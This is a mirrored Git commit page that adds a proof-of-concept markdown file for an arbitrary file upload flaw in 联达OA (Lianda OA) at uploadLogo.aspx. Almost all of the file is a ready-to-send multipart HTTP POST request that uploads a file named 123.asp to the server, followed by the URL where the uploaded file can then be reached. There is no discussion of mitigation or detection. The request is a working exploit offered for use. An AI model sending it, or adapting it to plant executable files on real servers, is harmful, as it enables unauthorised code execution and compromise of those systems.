mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 联达OA uploadLogo.aspx存在任意文件上传.md
This commit is contained in:
parent
9ac7ce5c84
commit
ce77194b36
24
联达OA uploadLogo.aspx存在任意文件上传.md
Normal file
24
联达OA uploadLogo.aspx存在任意文件上传.md
Normal file
@ -0,0 +1,24 @@
|
|||||||
|
## 联达OA uploadLogo.aspx存在任意文件上传
|
||||||
|
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /Hosp_Portal/uploadLogo.aspx HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Content-Length: 191
|
||||||
|
Content-Type: multipart/form-data; boundary=------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||||
|
|
||||||
|
--------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA
|
||||||
|
Content-Disposition: form-data; name="DesignId"
|
||||||
|
|
||||||
|
1
|
||||||
|
--------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA
|
||||||
|
Content-Disposition: form-data; name="Filedata";filename="123.asp"
|
||||||
|
|
||||||
|
123
|
||||||
|
--------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA--
|
||||||
|
```
|
||||||
|
|
||||||
|
文件路径
|
||||||
|
`http://xxx/Hosp_Portal/Logo/123.asp`
|
||||||
Loading…
x
Reference in New Issue
Block a user